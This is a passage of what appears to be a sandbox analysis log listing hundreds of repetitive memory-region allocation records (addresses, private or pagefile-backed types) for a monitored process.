start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16551 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16552 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16553 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16554 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16563 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16564 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16568 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16569 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16570 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16571 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16572 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16573 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16574 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16575 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16576 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16577 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16578 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16579 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16580 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16581 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16593 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16599 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16600 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16601 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16602 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16604 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16605 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16606 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16607 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16608 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16612 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16613 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16618 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16619 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16622 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16623 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16624 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16625 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16626 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16627 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16628 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16629 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16630 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16631 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16634 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16664 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16668 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16669 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16673 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16674 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16675 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16676 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16677 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16678 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16679 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16680 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16681 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16682 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16683 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16684 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16685 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16686 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16687 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 16688 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16689 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16690 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16691 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16692 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16693 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16694 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16695 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16696 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16697 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16698 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16699 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16700 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16701 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16702 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16703 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16704 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16705 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16706 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 16707 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16708 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16725 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16726 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16728 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 16729 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 16730 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16731 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16732 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16733 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16734 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16735 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16736 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16737 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 16738 start_va = 0x610000 end_va = 0x61efff 